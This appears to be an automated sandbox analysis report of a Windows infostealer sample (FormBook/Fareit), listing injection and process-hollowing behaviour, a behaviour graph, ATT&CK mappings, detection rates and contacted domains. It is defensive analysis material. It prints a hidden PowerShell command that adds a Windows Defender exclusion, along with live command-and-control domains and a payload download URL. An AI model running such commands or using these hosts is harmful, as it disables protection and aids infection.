        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ACDE9E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00ACDE9E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B2FE87 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AA76E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AD3EE4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AD3EE4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AD3EE4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AC16E0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B68ED6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AC36CC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AD8EC7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B4FEC0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00A9E620 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B4FE3F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00AD0E21 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00A9A63B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00A9A63B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B15623 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B15623 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B15623 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B15623 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B15623 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B15623 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B15623 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B15623 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B15623 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00B22E14 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00A9C600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 3_2_00A9C600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows \System32\Netplwiz.exe | Code function: 8_2_00007FF61AD32418 GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
        Source: C:\Users\Public\Citvon\Citvon.exe | Process token adjusted: Debug
        Source: C:\Users\Public\Citvon\Citvon.exe | Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\WWAHost.exe | Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\msiexec.exe | Process token adjusted: Debug
        Source: C:\Windows \System32\Netplwiz.exe | Code function: 8_2_613C1BC0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
        Source: C:\Windows \System32\Netplwiz.exe | Code function: 8_2_00007FF61AD33B90 SetUnhandledExceptionFilter,
        Source: C:\Windows \System32\Netplwiz.exe | Code function: 8_2_00007FF61AD338E4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

        HIPS / PFW / Operating System Protection Evasion:
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\explorer.exe | Domain query: www.thrg33.club
        Source: C:\Windows\explorer.exe | Domain query: www.georgeswebwerks.com
        Source: C:\Windows\explorer.exe | Network Connect: 198.54.117.212 80
        Adds a directory exclusion to Windows Defender
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command 'Add-MpPreference -ExclusionPath 'C:\Users''
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command 'Add-MpPreference -ExclusionPath 'C:\Users''
        DLL side loading technique detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\System32\netutils.dll
        Injects a PE file into a foreign processes
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Memory written: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\Public\Citvon\Citvon.exe | Memory written: C:\Users\Public\Citvon\Citvon.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\Public\Citvon\Citvon.exe | Memory written: C:\Users\Public\Citvon\Citvon.exe base: 400000 value starts with: 4D5A
        Maps a DLL or memory area into another process
        Source: C:\Users\Public\Citvon\Citvon.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\Public\Citvon\Citvon.exe | Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
        Source: C:\Users\Public\Citvon\Citvon.exe | Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
        Source: C:\Users\Public\Citvon\Citvon.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\Public\Citvon\Citvon.exe | Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
        Source: C:\Users\Public\Citvon\Citvon.exe | Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\WWAHost.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
        Source: C:\Windows\SysWOW64\WWAHost.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Users\Public\Citvon\Citvon.exe | Thread register set: target process: 3424
        Source: C:\Users\Public\Citvon\Citvon.exe | Thread register set: target process: 3424
        Source: C:\Windows\SysWOW64\WWAHost.exe | Thread register set: target process: 3424
        Queues an APC in another process (thread injection)
        Source: C:\Users\Public\Citvon\Citvon.exe | Thread APC queued: target process: C:\Windows\explorer.exe
        Sample uses process hollowing technique
        Source: C:\Users\Public\Citvon\Citvon.exe | Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: B60000
        Source: C:\Users\Public\Citvon\Citvon.exe | Section unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 1340000
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Process created: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\PXOR.bat
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows \System32\Netplwiz.exe C:\Windows \System32\Netplwiz.exe
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command 'Add-MpPreference -ExclusionPath 'C:\Users''
        Source: C:\Users\Public\Citvon\Citvon.exe | Process created: C:\Users\Public\Citvon\Citvon.exe C:\Users\Public\Citvon\Citvon.exe
        Source: C:\Users\Public\Citvon\Citvon.exe | Process created: C:\Users\Public\Citvon\Citvon.exe C:\Users\Public\Citvon\Citvon.exe
        Source: explorer.exe, 0000001A.00000002.915848941.0000000000AD8000.00000004.00000020.sdmp | Binary or memory string: ProgmanMD6
        Source: C:\Windows \System32\Netplwiz.exe | Code function: HeapSetInformation,memset,LoadCursorW,GetStockObject,RegisterClassW,GetUserDefaultUILanguage,GetLocaleInfoW,CreateWindowExW,GetLastError,CreateWindowExW,UsersRunDllW,DestroyWindow,
        Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows \System32\Netplwiz.exeCode function: 8_2_613C1AE0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
        Source: C:\Users\Public\Citvon\Citvon.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information:

        Yara detected FormBook
        Source: Yara match | File source: 0000001D.00000002.916527302.0000000001270000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001B.00000002.826581239.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000019.00000002.866605894.0000000000580000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001B.00000002.826744888.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000020.00000002.867119537.0000000000310000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000001.696290346.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001B.00000001.815038206.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000002.697862956.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000019.00000002.867284740.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001D.00000002.915615898.0000000000E50000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000019.00000002.865473652.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001B.00000002.827144868.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000019.00000001.796805895.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001D.00000002.916659708.00000000012A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 25.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 27.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 25.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 27.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 27.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 27.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 25.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 25.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE

        Remote Access Functionality:

        Yara detected FormBook

        Mitre Att&ck Matrix

        Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise
        Execution: Scripting (1), Shared Modules (1), PowerShell (1), At (Windows), Cron, Launchd, Scheduled Task, Command and Scripting Interpreter, PowerShell, AppleScript
        Persistence: DLL Side-Loading (11), Registry Run Keys / Startup Folder (1), Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows)
        Privilege Escalation: DLL Side-Loading (11), Process Injection (612), Registry Run Keys / Startup Folder (1), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows)
        Defense Evasion: Disable or Modify Tools (1), Deobfuscate/Decode Files or Information (1), Scripting (1), Obfuscated Files or Information (3), Software Packing (11), DLL Side-Loading (11), File Deletion (1), Masquerading (231), Virtualization/Sandbox Evasion (41), Process Injection (612)
        Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing
        Discovery: System Time Discovery (1), File and Directory Discovery (1), System Information Discovery (123), Query Registry (1), Security Software Discovery (251), Process Discovery (2), Virtualization/Sandbox Evasion (41), Application Window Discovery (1), Remote System Discovery (1), Process Discovery
        Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot, Software Deployment Tools, Taint Shared Content
        Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging
        Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol, Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
        Command and Control: Ingress Tool Transfer (1), Encrypted Channel (1), Non-Application Layer Protocol (2), Application Layer Protocol (12), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols
        Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols, Rogue Cellular Base Station
        Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
        Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue, Data Destruction, Data Encrypted for Impact

        Behavior Graph

        Behavior Graph ID: 411769 | Sample: Citvonvhciktufwvyzyhistnewd... | Start date: 12/05/2021 | Architecture: WINDOWS | Score: 100

        Start (sample)
          DNS/IP: www.rest-blog.com
          Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for dropped file; 5 other signatures
          started: Citvon.exe (16)
            DNS/IP: xhtfga.dm.files.1drv.com; 2 other IPs or domains
            Signatures: Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); Machine Learning detection for dropped file
            started: Citvon.exe
              Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
              injected: explorer.exe
                DNS/IP: www.georgeswebwerks.com; www.thrg33.club; parkingpage.namecheap.com 198.54.117.212, 49779, 80 NAMECHEAP-NETUS United States
                Signatures: System process connects to network (likely due to code injection or exploit)
                started: WWAHost.exe
                  Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                started: msiexec.exe
                started: autoconv.exe
                started: autofmt.exe
          started: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe (1, 25)
            DNS/IP: 192.168.2.1 unknown unknown; xhtfga.dm.files.1drv.com; 2 other IPs or domains
            Dropped: C:\Users\Public\Netplwiz.exe (PE32+); C:\Users\Public\NETUTILS.dll (PE32+); C:\Users\Public\Citvon\Citvon.exe (PE32)
            Signatures: Drops PE files to the user root directory; Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
            started: cmd.exe (1)
              started: cmd.exe (5)
                Dropped: C:\Windows \System32\Netplwiz.exe (PE32+); C:\Windows \System32\NETUTILS.dll (PE32+)
                Signatures: Drops executables to the windows directory (C:\Windows) and starts them
                started: Netplwiz.exe
                  started: cmd.exe (1)
                    Signatures: Suspicious powershell command line found; Adds a directory exclusion to Windows Defender
                    started: powershell.exe (27)
                      Signatures: DLL side loading technique detected
                      started: conhost.exe
                    started: conhost.exe
                started: conhost.exe
              started: conhost.exe
            started: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
          started: Citvon.exe (16)
            DNS/IP: xhtfga.dm.files.1drv.com; 2 other IPs or domains
            started: Citvon.exe


        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        Source | Detection | Scanner | Label
        Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | 70% | Virustotal |
        Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | 44% | Metadefender |
        Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | 66% | ReversingLabs | Win32.Infostealer.Fareit
        Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | 100% | Joe Sandbox ML |

        Dropped Files

        Source | Detection | Scanner | Label
        C:\Users\Public\Citvon\Citvon.exe | 100% | Joe Sandbox ML |
        C:\Users\Public\Citvon\Citvon.exe | 44% | Metadefender |
        C:\Users\Public\Citvon\Citvon.exe | 66% | ReversingLabs | Win32.Infostealer.Fareit
        C:\Users\Public\NETUTILS.dll | 5% | Metadefender |
        C:\Users\Public\NETUTILS.dll | 21% | ReversingLabs |
        C:\Users\Public\Netplwiz.exe | 0% | Metadefender |
        C:\Users\Public\Netplwiz.exe | 0% | ReversingLabs |
        C:\Windows \System32\NETUTILS.dll | 5% | Metadefender |
        C:\Windows \System32\NETUTILS.dll | 21% | ReversingLabs |

        Unpacked PE Files

        Source | Detection | Scanner | Label
        25.2.Citvon.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
        3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
        3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
        27.2.Citvon.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
        27.1.Citvon.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
        25.1.Citvon.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

        Domains

        Source | Detection | Scanner | Label
        www.rest-blog.com | 0% | Virustotal |
        www.georgeswebwerks.com | 0% | Virustotal |

        URLs

        Source | Detection | Scanner | Label
        http://osoft.com/PKI/doefault.htm0 | 0% | Avira URL Cloud | safe
        http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
        http://crl.microsof | 0% | URL Reputation | safe
        https://go.micro | 0% | URL Reputation | safe
        https://contoso.com/ | 0% | URL Reputation | safe
        http://schemas.microsoft.coT | 0% | Avira URL Cloud | safe
        https://contoso.com/License | 0% | URL Reputation | safe
        https://contoso.com/Icon | 0% | URL Reputation | safe
        http://mscrl.micro | 0% | Avira URL Cloud | safe
        www.clinics.life/qku9/ | 0% | Avira URL Cloud | safe

        Domains and IPs

        Contacted Domains

        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        www.rest-blog.com | 118.27.99.91 | true | false | | unknown
        parkingpage.namecheap.com | 198.54.117.212 | true | false | | high
        www.thrg33.club | unknown | unknown | true | | unknown
        www.georgeswebwerks.com | unknown | unknown | true | | unknown
        onedrive.live.com | unknown | unknown | false | | high
        xhtfga.dm.files.1drv.com | unknown | unknown | false | | high

        Contacted URLs

        Name | Malicious | Antivirus Detection | Reputation
        www.clinics.life/qku9/ | true | Avira URL Cloud: safe | low

        URLs from Memory and Binaries

        Name | Source | Malicious | Antivirus Detection | Reputation
        https://xhtfga.dm.files.1drv.com/y4m8SMkzvpejvDLx8dnrECcyq_e2qmwA_A7cOWUQWdVRMq0yniUlzBSm_G1n5_On9Y_ | Citvon.exe, 00000011.00000003.736694886.000000000083E000.00000004.00000001.sdmp; Citvon.exe, 00000014.00000003.752669738.00000000008D0000.00000004.00000001.sdmp | false | | high
        http://nuget.org/NuGet.exe | powershell.exe, 0000000D.00000002.749646155.00000172BA104000.00000004.00000001.sdmp | false | | high
        http://osoft.com/PKI/doefault.htm0 | powershell.exe, 0000000D.00000002.752441482.00000172C23D0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
        http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000D.00000002.736725813.00000172AA2B1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
        http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 0000000D.00000002.736959186.00000172AA43B000.00000004.00000001.sdmp | false | | high
        http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000D.00000002.736725813.00000172AA2B1000.00000004.00000001.sdmp | false | | high
